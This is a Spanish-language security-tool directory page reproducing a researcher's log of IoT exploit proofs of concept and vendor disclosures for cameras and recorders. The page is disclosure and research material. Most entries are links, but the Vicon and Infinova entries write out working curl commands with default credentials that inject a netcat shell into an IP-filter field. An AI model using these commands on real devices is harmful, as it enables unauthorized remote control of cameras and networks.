Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
Herramientas/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

Ver Repositorio
783307hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC

PoC variados - Internet de cosas (in)seguras

Merece mucho la pena leer sobre estas cosas (in)seguras de mala calidad: https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260

2021-10-19

Todo el crédito para Watchful_IP (https://watchfulip.github.io/)

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045

2021-10-06

Detalles: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC: https://github.com/mcw0/DahuaConsole

2021-09-06

Dos bypass de autenticación independientes.

Debido al altísimo potencial de otro "hackeo masivo de Dahua", mantendré los detalles de Full Disclosure hasta el 6 de octubre de 2021.

Se recomienda encarecidamente actualizar el firmware hasta entonces.

https://www.dahuasecurity.com/support/cybersecurity/details/957

Dahua DES/3DES cifrado/descifrado, fugas de credenciales NetSDK, claves/contraseñas Cloud, PoC DHP2P

2020-05-09

  • Implementación de autenticación Dahua DES/3DES (rota) y PSK
  • Vulnerabilidad: El NetSDK de Dahua filtra credenciales (primeros 8 caracteres) de todos los clientes en la solicitud REALM al usar los protocolos DVRIP y DHP2P
  • PoC: Añadido un simple listener TCP/37777 DVRIP para mostrar las credenciales descifradas en texto claro
  • Vulnerabilidad: Fuga de credenciales del protocolo Cloud DHP2P de Dahua
  • Vulnerabilidad: Claves/contraseñas Cloud DHP2P hardcodeadas para 23 proveedores diferentes
  • PoC: Acceso a dispositivos dentro de DHP2P Cloud. PoC hecho solo para Dahua IMOU

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

Update: Dahua-JSON-Debug-Console-v2.py

2020-02-29

  • Añadida la opción 'setDebug', debería empezar a producir salida desde Debug Console en VTO/VTH
  • Añadido '--discover', búsqueda multicast de dispositivos o sondeo directo (--rhost 192.168.57.20) del dispositivo vía UDP/37810
  • Añadido '--dump {config,service}' para volcar config o servicios en el host remoto sin entrar en Debug Console

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

Update

2020-02-15

Durante esta semana se ha establecido contacto con Dahua PSIRT; se han proporcionado detalles, PoC y pruebas para 23 proveedores de nube diferentes. También seguiré el nuevo ensayo de Google Zero 'Policy and Disclosure: 2020 Edition' (ya que tiene sentido para mí), lo que significa que publicaré después de 90 días, independientemente de si Dahua lanza actualizaciones antes o después del 09.05.2020 19:00 UTC (9 de mayo de 2020 19:00 UTC).

Dahua, por favor, arregladlo y haced las actualizaciones disponibles antes de esta fecha...

Referencia: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

Hace unas horas

2020-02-10

Acabo de revelar a Dahua PSIRT fugas de credenciales (que terminan en texto claro) del SDK de Dahua; a ver cómo se toman esta información. Bastante mal cuando hay más de 20 proveedores de nube diferentes involucrados... 90 días contando desde hoy.

Tools

2020-01-20

Nuevo repositorio creado donde planeo subir algunas herramientas.

https://github.com/mcw0/Tools

Primero: Dahua-JSON-Debug-Console-v2.py

  • Portado a Python 3
  • Corregidos algunos errores y ajustes de código
  • Añadido soporte para DVRIP (TCP/37777) [Nota: algunos comandos JSON que funcionan con DHIP no devuelven nada con DVRIP]
  • encode/decode en latin-1, podríamos necesitar caracteres intactos entre 0x00 - 0xff
  • Mejor 'debug' con hexdump como opción

Axis Communications

2019-10-06 (cosas viejas)

Detectar anónimamente el modelo y la versión de firmware de dispositivos Axis (1998 - 2019).

https://github.com/mcw0/PoC/blob/master/axis-detect.py

Realtek Managed Switch Controller (RTL83xx) PoC

2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

Varias vulnerabilidades en múltiples switches de red

2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

Todos los detalles técnicos junto con el PoC en Python se publicarán aquí el 20 de agosto de 2019.

LifeSafety Power

2019-05-15

Múltiples stack overflows, RCE, divulgación de usuario/contraseña en texto claro y más

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON Debug Console (autenticado)

2019-04-10

Este script usará el protocolo binario P2P 'DHIP' de Dahua, que funciona en puertos HTTP/HTTPS normales y TCP/5000

Se adjuntará a la 'Debug Console' interna de los dispositivos Dahua usando JSON (mismo tipo que el antiguo debug en TCP/6789)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

Que os divirtáis, bashis

VDOO

2019-01-23

Saludos, ha pasado mucho tiempo sin publicar ...

Sigo por aquí y haciendo mi investigación, pero la novedad es que también intento trabajar con VDOO (https://www.vdoo.com/) para la gestión con los fabricantes, y esto desgraciadamente ha retrasado un poco mi proceso de Full Disclosure ...

De todos modos, se vienen varias investigaciones interesantes como Full Disclosure aquí en mi GitHub.

Con la colaboración de VDOO puedo dedicarme a lo que me gusta, y no perder tiempo con los fabricantes que (no quieren | no entienden | quieren ignorar | quieren retrasar | lo que sea).

Lo más reciente son cosas de Reolink (https://reolink.com/), que encontraréis aquí: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (autenticado)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd y OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} RCE autenticado

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. IP Camera/Video/Access Control - Múltiples ejecuciones remotas de comandos - Múltiples stack overflows - Double free - Acceso no autorizado https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

Geovision Inc. IP Camera y Video Server - PoC de ejecución remota de comandos https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

Demonio Herospeed TelnetSwitch ejecutándose en TCP/787, para permitir habilitar telnetd. Donde un pequeño stack overflow nos permite sobrescribir la contraseña generada dinámicamente y habilitar telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Pequeño wrapper de OpenSSL para iterar sobre diferentes claves/digests de cifrado y cifradores en imágenes de firmware Foscam IPC. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

Desofuscar cadenas/login/contraseña/cryptokey en varios binarios y librerías Foscam IPC https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE y divulgación de información (y posiblemente otros OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

Cadena de formato de pila remota en el binario 'nsd' de múltiples OEM (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

Imagen aquí: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

Prueba de concepto de backdoor Format String que no crashea

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (autenticado)

2017-12-03

// Habilitar 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Añadir al 'IP Filter' y ejecutar

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Deshabilitar 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Eliminar del 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (autenticado)

2017-12-03

// Habilitar 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Añadir al 'IP Filter' y ejecutar

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Deshabilitar 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Eliminar del 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Nota: Bastante seguro de que hay otros OEM que comparten lo mismo.

Axis Communications

2017-12-01 Axis Communications MPQT/PACS Heap Overflow y fuga de información https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 Shell de privacidad stunnel inverso TLSv1 https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 Cámaras IP Vivotek - Remote Stack Overflow https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 Uniview RCE y PoC de exportación de configuración https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 Un viejo fuzzing olvidado del Q3/2016 que condujo a RCE (PoC: shell inversa de conexión remota) y lectura remota de /etc/shadow. Reportado a Axis y corregido en Q3/2016; aun así lo publico ahora aquí porque puede ser una buena pista. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Habilitar / Deshabilitar Telnetd en Dahua (para versiones de firmware más recientes) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Reedición pública del PoC del backdoor de Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

Con mi nuevo conocimiento de dispositivos vulnerables por ahí con un número increíble de más de 1 millón de unidades Dahua / OEM, conocimiento que proviene de un informe realizado por NSFOCUS y de mi propia investigación en shodan.io.

Con este conocimiento, no publicaré el PoC en Python públicamente como dije antes para el 5 de abril, ya que no es necesario cuando el PoC ya ha sido verificado por IPVM y otros investigadores de seguridad independientes.

Sin embargo, estoy abierto a compartir el PoC con investigadores de seguridad serios si así se desea; envíenme un correo fuera de la lista y sean claros sobre quiénes son para no tomarlos por pedigüeños, a los cuales ignoro.

Informe de NSFOCUS: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


¿Os habéis fijado en las fechas y horas de los parches de Dahua? Mirad las capturas de pantalla de http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

No solo NVR/DVR/IPC/HDCVI están en la lista

También el sistema de intercomunicación; el VTO2000A ha sido confirmado http://www1.dahuasecurity.com/au/products/vto2000a-762.html

Descargar herramienta